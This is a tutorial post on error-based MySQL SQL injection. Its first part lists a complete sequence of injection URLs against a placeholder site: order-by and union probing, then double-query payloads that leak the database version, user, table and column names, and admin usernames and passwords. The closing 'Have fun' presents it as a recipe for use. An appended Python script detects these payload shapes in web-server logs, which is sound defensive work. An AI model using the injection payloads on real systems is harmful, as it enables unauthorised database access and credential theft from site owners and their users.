- Check for errors

http://www.site.com/index.php?id=1 order by 100--+-    * Error
http://www.site.com/index.php?id=1 order by 1--+-      * No error
http://www.site.com/index.php?id=1 order by 10--+-     * No error
http://www.site.com/index.php?id=1 order by 15--+-     * Error
http://www.site.com/index.php?id=1 order by 11--+-     * Error

OK. Next comes the familiar step: union

- union

http://www.site.com/index.php?id=1 union all select 1,2,3,4,5,6,7,8,9,10--+-

We will get the following error message:

The used SELECT statements have a different number of columns.

Now we start querying, following these steps:

1. Get version

http://www.site.com/index.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 --+-


2. Get database name

http://www.site.com/index.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 --+-

3. Get user

http://www.site.com/index.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 --+-

4. Get the number of tables

http://www.site.com/index.php?id=1  and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0x<database-name-in-hex> )) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 --+-

5. Get the table names

http://www.site.com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0x<database-name-in-hex> limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+-

http://www.site.com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0x<database-name-in-hex> limit 0,1)) from information_schema.tables limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 --+-

Note that you keep incrementing the limit 0,1 until you find the table you are after (the table that holds user and pass). Its form is limit N,1; here we increase the value of N step by step.

Once the table holding user and pass has been identified, we proceed to get its columns.

6. Get the number of columns

http://www.site.com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0x<database-name-in-hex> AND table_name=0x<table-name-in-hex> )) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 --+-

7. Get the column names

http://www.site.com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x<database-name-in-hex> AND table_name=0x<table-name-in-hex> limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

8. Get username and pass

http://www.site.com/index.php?id=1  and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(<table-name>.<column-name> as char),0x27,0x7e) FROM `<database-name>`.admin LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 --+-



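From the defender's side, every request in steps 1-8 above shares the same shape: an order by / union probe first, then the floor(rand(0)*2) ... group by duplicate-key trick wrapped around information_schema with 0x7e,0x27 markers. As an added example that is not part of the original post, the following script scans constructed web-server access log lines for exactly those shapes and reports which clients progressed from column probing to the extraction stage (the signature names and sample log lines are assumptions made for this example):

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the payload shapes in the post above (constructed for this example)
SIGNATURES = {
    "orderby_probe": re.compile(r"\border\s+by\s+\d+\s*--", re.I),
    "union_probe": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    # floor(rand(0)*2) ... group by: the duplicate-key error trick used in steps 1-8
    "double_query": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*?\bgroup\s+by\b", re.I | re.S),
    "info_schema": re.compile(r"information_schema\s*\.\s*(?:tables|columns)", re.I),
    # concat(0x7e,0x27,...): the ~' markers that fence the leaked value inside the error text
    "hex_delimiter": re.compile(r"concat\s*\(\s*0x7e\s*,\s*0x27", re.I),
}
# Common/combined log format: client ident user [time] "METHOD path HTTP/x" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def classify(path):
    """Return the signature names matching the URL-decoded request path."""
    decoded = unquote_plus(path)  # both %20 and '+' (as in --+-) become spaces
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan(lines):
    """Return (client_ip, status, tags) for every log line that carries a signature."""
    hits = []
    for m in filter(None, map(LOG_RE.match, lines)):
        ip, path, status = m.groups()
        tags = classify(path)
        if tags:
            hits.append((ip, status, tags))
    return hits

def escalated(hits):
    """Clients that moved from column probing (order by) to the double-query extraction stage."""
    seen = {}
    for ip, _status, tags in hits:
        seen.setdefault(ip, set()).update(tags)
    return sorted(ip for ip, t in seen.items() if {"orderby_probe", "double_query"} <= t)

# Constructed sample log lines mirroring the request sequence shown in the post
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?id=1%20order%20by%20100--+- HTTP/1.1" 500 0',
    '203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] '
    '"GET /index.php?id=1%20union%20all%20select%201,2,3,4,5,6,7,8,9,10--+- HTTP/1.1" 500 0',
    '203.0.113.5 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?id=1%20and(select%201%20from(select%20'
    'count(*),concat((select%20concat(0x7e,0x27,cast(version()%20as%20char),0x27,0x7e)),'
    'floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%20--+- HTTP/1.1" 500 0',
    '198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?id=2 HTTP/1.1" 200 498',
]
```

Running scan(SAMPLE_LOG) flags the three probing and extraction requests from 203.0.113.5 and leaves the ordinary id=1 and id=2 requests alone; escalated() then names that client as having reached the extraction stage. Note that the same requests also leave a trail of repeated 500 responses and MySQL "Duplicate entry" errors in the application log, which is a second, independent place to alert on.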
Done. Have fun. If you copy this, please credit the source.
